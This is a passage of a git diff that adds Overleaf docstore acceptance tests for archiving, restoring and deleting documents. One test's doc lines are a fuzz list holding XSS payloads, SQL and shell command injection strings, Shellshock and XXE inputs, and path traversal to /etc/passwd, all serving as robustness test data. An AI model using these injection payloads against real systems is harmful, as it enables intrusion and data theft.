'"><script>alert(123);</script x="', + "'><script>alert(123);</script x='", + 
'><script>alert(123);</script x=', + '" autofocus onkeyup="javascript:alert(123)', + "' autofocus onkeyup='javascript:alert(123)", + '<script\\x20type="text/javascript">javascript:alert(1);</script>', + '<script\\x3Etype="text/javascript">javascript:alert(1);</script>', + '<script\\x0Dtype="text/javascript">javascript:alert(1);</script>', + '<script\\x09type="text/javascript">javascript:alert(1);</script>', + '<script\\x0Ctype="text/javascript">javascript:alert(1);</script>', + '<script\\x2Ftype="text/javascript">javascript:alert(1);</script>', + '<script\\x0Atype="text/javascript">javascript:alert(1);</script>', + '\'`"><\\x3Cscript>javascript:alert(1)</script> ', + '\'`"><\\x00script>javascript:alert(1)</script>', + 'ABC<div style="x\\x3Aexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:expression\\x5C(javascript:alert(1)">DEF', + 'ABC<div style="x:expression\\x00(javascript:alert(1)">DEF', + 'ABC<div style="x:exp\\x00ression(javascript:alert(1)">DEF', + 'ABC<div style="x:exp\\x5Cression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Aexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x09expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE3\\x80\\x80expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x84expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xC2\\xA0expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x80expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Dexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Cexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x87expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x20expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x88expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x00expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x86expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x85expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x82expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Bexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x81expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x83expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x89expression(javascript:alert(1)">DEF', + '<a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + 
'<a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x0D:javascript:alert(1)" 
id="fuzzelement1">test</a>', + '<a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', + '`"\'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x22onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x0Donerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x09onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x0Conerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x00onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x27onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x20onerror=javascript:alert(1)>', + '"`\'><script>\\x3Bjavascript:alert(1)</script>', + '"`\'><script>\\x0Djavascript:alert(1)</script>', + '"`\'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x81javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x84javascript:alert(1)</script>', + '"`\'><script>\\xE3\\x80\\x80javascript:alert(1)</script>', + '"`\'><script>\\x09javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x89javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x85javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x88javascript:alert(1)</script>', + '"`\'><script>\\x00javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>', + '"`\'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>', + '"`\'><script>\\x0Cjavascript:alert(1)</script>', + '"`\'><script>\\x2Bjavascript:alert(1)</script>', + '"`\'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>', + '"`\'><script>-javascript:alert(1)</script>', + '"`\'><script>\\x0Ajavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>', + '"`\'><script>\\x7Ejavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x87javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>', + '"`\'><script>\\xC2\\x85javascript:alert(1)</script>', + '"`\'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x83javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>', + '"`\'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x80javascript:alert(1)</script>', + '"`\'><script>\\x21javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x82javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x86javascript:alert(1)</script>', + '"`\'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>', + '"`\'><script>\\x0Bjavascript:alert(1)</script>', + '"`\'><script>\\x20javascript:alert(1)</script>', + '"`\'><script>\\xC2\\xA0javascript:alert(1)</script>', + '<img \\x00src=x onerror="alert(1)">', + '<img \\x47src=x onerror="javascript:alert(1)">', + '<img \\x11src=x onerror="javascript:alert(1)">', + '<img \\x12src=x onerror="javascript:alert(1)">', + '<img\\x47src=x onerror="javascript:alert(1)">', + '<img\\x10src=x onerror="javascript:alert(1)">', + '<img\\x13src=x onerror="javascript:alert(1)">', + '<img\\x32src=x onerror="javascript:alert(1)">', + '<img\\x47src=x onerror="javascript:alert(1)">', + '<img\\x11src=x onerror="javascript:alert(1)">', + '<img \\x47src=x onerror="javascript:alert(1)">', + '<img \\x34src=x onerror="javascript:alert(1)">', + '<img \\x39src=x onerror="javascript:alert(1)">', + '<img \\x00src=x 
onerror="javascript:alert(1)">', + '<img src\\x09=x onerror="javascript:alert(1)">', + '<img src\\x10=x onerror="javascript:alert(1)">', + '<img src\\x13=x onerror="javascript:alert(1)">', + '<img src\\x32=x onerror="javascript:alert(1)">', + '<img src\\x12=x onerror="javascript:alert(1)">', + '<img src\\x11=x onerror="javascript:alert(1)">', + '<img src\\x00=x onerror="javascript:alert(1)">', + '<img src\\x47=x onerror="javascript:alert(1)">', + '<img src=x\\x09onerror="javascript:alert(1)">', + '<img src=x\\x10onerror="javascript:alert(1)">', + '<img src=x\\x11onerror="javascript:alert(1)">', + '<img src=x\\x12onerror="javascript:alert(1)">', + '<img src=x\\x13onerror="javascript:alert(1)">', + '<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', + '<img src=x onerror=\\x09"javascript:alert(1)">', + '<img src=x onerror=\\x10"javascript:alert(1)">', + '<img src=x onerror=\\x11"javascript:alert(1)">', + '<img src=x onerror=\\x12"javascript:alert(1)">', + '<img src=x onerror=\\x32"javascript:alert(1)">', + '<img src=x onerror=\\x00"javascript:alert(1)">', + '<a href=java script:javascript:alert(1)>XXX</a>', + '<img src="x` `<script>javascript:alert(1)</script>"` `>', + '<img src onerror /" \'"= alt=javascript:alert(1)//">', + '<title onpropertychange=javascript:alert(1)>', + '<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', + '<!--[if]><script>javascript:alert(1)</script -->', + '<!--[if<img src=x onerror=javascript:alert(1)//]> -->', + '<script src="/\\%(jscript)s"></script>', + '<script src="\\\\%(jscript)s"></script>', + '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', + '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', + '<IMG SRC=# onmouseover="alert(\'xxs\')">', + '<IMG SRC= onmouseover="alert(\'xxs\')">', + '<IMG onmouseover="alert(\'xxs\')">', + '<IMG SRC=javascript:alert('XSS')>', + '<IMG SRC=javascript:alert('XSS')>', + '<IMG SRC=javascript:alert('XSS')>', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + 'perl -e \'print "<IMG SRC=java\\0script:alert(\\"XSS\\")>";\' > out', + '<IMG SRC="  javascript:alert(\'XSS\');">', + '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', + '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>', + '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', + '<<SCRIPT>alert("XSS");//<</SCRIPT>', + '<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >', + '<SCRIPT SRC=//ha.ckers.org/.j>', + '<IMG SRC="javascript:alert(\'XSS\')"', + '<iframe src=http://ha.ckers.org/scriptlet.html <', + "\\\";alert('XSS');//", + '<plaintext>', + '1;DROP TABLE users', + "1'; DROP TABLE users-- 1", + "' OR 1=1 -- 1", + "' OR '1'='1", + '-', + '--', + '--version', + '--help', + '$USER', + '/dev/null; touch /tmp/blns.fail ; echo', + '`touch /tmp/blns.fail`', + '$(touch /tmp/blns.fail)', + '@{[system "touch /tmp/blns.fail"]}', + 'eval("puts \'hello world\'")', + 'System("ls -al /")', + '`ls -al /`', + 'Kernel.exec("ls -al /")', + 'Kernel.exit(1)', + "%x('ls -al /')", + '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>', + '$HOME', + "$ENV{'HOME'}", + '%d', + '%s', + '%*.*s', + '../../../../../../../../../../../etc/passwd%00', + '../../../../../../../../../../../etc/hosts', + '() { 0; }; touch /tmp/blns.shellshock1.fail;', + '() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }', + 'CON', + 'PRN', + 'AUX', + 
'CLOCK$', + 'NUL', + 'A:', + 'ZZ:', + 'COM1', + 'LPT1', + 'LPT2', + 'LPT3', + 'COM2', + 'COM3', + 'COM4', + 'Scunthorpe General Hospital', + 'Penistone Community Church', + 'Lightwater Country Park', + 'Jimmy Clitheroe', + 'Horniman Museum', + 'shitake mushrooms', + 'RomansInSussex.co.uk', + 'http://www.cum.qc.ca/', + 'Craig Cockburn, Software Specialist', + 'Linda Callahan', + 'Dr. Herman I. Libshitz', + 'magna cum laude', + 'Super Bowl XXX', + 'medieval erection of parapets', + 'evaluate', + 'mocha', + 'expression', + 'Arsenal canal', + 'classic', + 'Tyson Gay', + "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.", + 'Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue', + 'But now...\u001b[20Cfor my greatest trick...\u001b[8m', + 'The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]', + 'Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗', + ], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + }) + } + ) + }) + + it('should successfully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + describe('a doc with ranges', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: { + changes: [ + { + id: new ObjectId(), + op: { i: 'foo', p: 24 }, + metadata: { + user_id: new ObjectId(), + ts: new Date('2017-01-27T16:10:44.194Z'), + }, + }, + { + id: new ObjectId(), + op: { d: 'bar', p: 50 }, + metadata: { + user_id: new ObjectId(), + ts: new Date('2017-01-27T18:10:44.194Z'), + }, + }, + ], + comments: [ + { + id: new ObjectId(), + op: { c: 'comment', p: 284, t: new ObjectId() }, + metadata: { + user_id: new ObjectId(), + ts: new 
Date('2017-01-26T14:22:04.869Z'), + }, + }, + ], + }, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + }) + } + ) + }) + + it('should successfully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + const ranges = JSON.parse(JSON.stringify(this.doc.ranges)) // ObjectId -> String + s3Doc.ranges.should.deep.equal(ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + describe('a doc that is archived twice', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['abc', 'def', 'ghi'], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + this.res.statusCode.should.equal(204) + return DocstoreClient.archiveAllDoc( + this.project_id, + (error, res1) => { + this.res = res1 + if (error != null) { + throw error + } + this.res.statusCode.should.equal(204) + return done() + } + ) + }) + } + ) + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = 
fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + return describe('a doc with the old schema (just an array of lines)', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['abc', 'def', 'ghi'], + ranges: {}, + version: 2, + } + uploadContent( + `${this.project_id}/${this.doc._id}`, + this.doc.lines, + error => { + expect(error).not.to.exist + db.docs.insertOne( + { + project_id: this.project_id, + _id: this.doc._id, + rev: this.doc.version, + inS3: true, + }, + error => { + if (error != null) { + throw error + } + DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + } + ) + } + ) + }) + + it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + expect(doc.inS3).not.to.exist + return done() + }) + }) + + return it('should return the doc', function (done) { + this.fetched_docs[0].lines.should.deep.equal(this.doc.lines) + return done() + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/DeletingDocsTests.js b/services/docstore/test/acceptance/js/DeletingDocsTests.js new file mode 100644 index 0000000..3959246 --- /dev/null +++ b/services/docstore/test/acceptance/js/DeletingDocsTests.js @@ -0,0 +1,511 @@ +const { db, ObjectId } = require('../../../app/js/mongodb') +const { expect } = require('chai') +const DocstoreApp = require('./helpers/DocstoreApp') +const Errors = require('../../../app/js/Errors') +const Settings = require('@overleaf/settings') +const { Storage } = require('@google-cloud/storage') + +const DocstoreClient = require('./helpers/DocstoreClient') + +function deleteTestSuite(deleteDoc) { + before(async function () { + // Create buckets needed by the archiving part of these tests + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.createBucket(Settings.docstore.bucket) + await storage.createBucket(`${Settings.docstore.bucket}-deleted`) + }) + + after(async function () { + // Tear down the buckets created above + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.bucket(Settings.docstore.bucket).deleteFiles() + await storage.bucket(Settings.docstore.bucket).delete() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).deleteFiles() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).delete() + }) + + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.lines = ['original', 'lines'] + this.version = 42 + this.ranges = [] + DocstoreApp.ensureRunning(() => { + DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error) { + throw error + } + done() + } + ) + }) + }) + + it('should show as not deleted on /deleted', function (done) { + DocstoreClient.isDocDeleted( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + 
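// A live doc still resolves on /deleted: the endpoint returns 200 with + // deleted=false until the doc is soft-deleted via PATCH in the suites below. + 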
expect(res.statusCode).to.equal(200) + expect(body).to.have.property('deleted').to.equal(false) + done() + } + ) + }) + + describe('when the doc exists', function () { + beforeEach(function (done) { + deleteDoc(this.project_id, this.doc_id, (error, res, doc) => { + if (error) return done(error) + this.res = res + done() + }) + }) + + afterEach(function (done) { + db.docs.deleteOne({ _id: this.doc_id }, done) + }) + + it('should mark the doc as deleted on /deleted', function (done) { + DocstoreClient.isDocDeleted( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + expect(res.statusCode).to.equal(200) + expect(body).to.have.property('deleted').to.equal(true) + done() + } + ) + }) + + it('should insert a deleted doc into the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((error, docs) => { + if (error) return done(error) + docs[0]._id.should.deep.equal(this.doc_id) + docs[0].lines.should.deep.equal(this.lines) + docs[0].deleted.should.equal(true) + done() + }) + }) + + it('should not export the doc to s3', function (done) { + setTimeout(() => { + DocstoreClient.getS3Doc(this.project_id, this.doc_id, error => { + expect(error).to.be.instanceOf(Errors.NotFoundError) + done() + }) + }, 1000) + }) + }) + + describe('when archiveOnSoftDelete is enabled', function () { + let archiveOnSoftDelete + beforeEach('overwrite settings', function () { + archiveOnSoftDelete = Settings.docstore.archiveOnSoftDelete + Settings.docstore.archiveOnSoftDelete = true + }) + afterEach('restore settings', function () { + Settings.docstore.archiveOnSoftDelete = archiveOnSoftDelete + }) + + beforeEach('delete Doc', function (done) { + deleteDoc(this.project_id, this.doc_id, (error, res) => { + if (error) return done(error) + this.res = res + done() + }) + }) + + beforeEach(function waitForBackgroundFlush(done) { + setTimeout(done, 500) + }) + + afterEach(function cleanupDoc(done) { + db.docs.deleteOne({ _id: this.doc_id }, done) + }) + + it('should set the deleted flag in the doc', function (done) { + db.docs.findOne({ _id: this.doc_id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.deleted).to.equal(true) + done() + }) + }) + + it('should set inS3 and unset lines and ranges in the doc', function (done) { + db.docs.findOne({ _id: this.doc_id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.lines).to.not.exist + expect(doc.ranges).to.not.exist + expect(doc.inS3).to.equal(true) + done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + DocstoreClient.getS3Doc(this.project_id, this.doc_id, (error, s3doc) => { + if (error) { + return done(error) + } + expect(s3doc.lines).to.deep.equal(this.lines) + expect(s3doc.ranges).to.deep.equal(this.ranges) + done() + }) + }) + }) + + describe('when the doc exists in another project', function () { + const otherProjectId = new ObjectId() + + it('should show as not existing on /deleted', function (done) { + DocstoreClient.isDocDeleted(otherProjectId, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(404) + done() + }) + }) + + it('should return a 404 when trying to delete', function (done) { + deleteDoc(otherProjectId, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(404) + done() + }) + }) + }) + + describe('when the doc does not exist', function () { + it('should show as not existing on /deleted', function (done) { + const missingDocId = new 
ObjectId() + DocstoreClient.isDocDeleted( + this.project_id, + missingDocId, + (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(404) + done() + } + ) + }) + + it('should return a 404', function (done) { + const missingDocId = new ObjectId() + deleteDoc(this.project_id, missingDocId, (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + done() + }) + }) + }) +} + +describe('Delete via PATCH', function () { + deleteTestSuite(DocstoreClient.deleteDoc) + + describe('when providing a custom doc name in the delete request', function () { + beforeEach(function (done) { + DocstoreClient.deleteDocWithName( + this.project_id, + this.doc_id, + 'wombat.tex', + done + ) + }) + + it('should insert the doc name into the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((error, docs) => { + if (error) return done(error) + expect(docs[0].name).to.equal('wombat.tex') + done() + }) + }) + }) + + describe('when providing a custom deletedAt date in the delete request', function () { + beforeEach('record date and delay', function (done) { + this.deletedAt = new Date() + setTimeout(done, 5) + }) + + beforeEach('perform deletion with past date', function (done) { + DocstoreClient.deleteDocWithDate( + this.project_id, + this.doc_id, + this.deletedAt, + done + ) + }) + + it('should insert the date into the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((error, docs) => { + if (error) return done(error) + expect(docs[0].deletedAt.toISOString()).to.equal( + this.deletedAt.toISOString() + ) + done() + }) + }) + }) + + describe('when providing no doc name in the delete request', function () { + beforeEach(function (done) { + DocstoreClient.deleteDocWithName( + this.project_id, + this.doc_id, + '', + (error, res) => { + this.res = res + done(error) + } + ) + }) + + it('should reject the request', function () { + expect(this.res.statusCode).to.equal(400) + }) + }) + + describe('when providing no date in the delete request', function () { + beforeEach(function (done) { + DocstoreClient.deleteDocWithDate( + this.project_id, + this.doc_id, + '', + (error, res) => { + this.res = res + done(error) + } + ) + }) + + it('should reject the request', function () { + expect(this.res.statusCode).to.equal(400) + }) + }) + + describe('before deleting anything', function () { + it('should show nothing in deleted docs response', function (done) { + 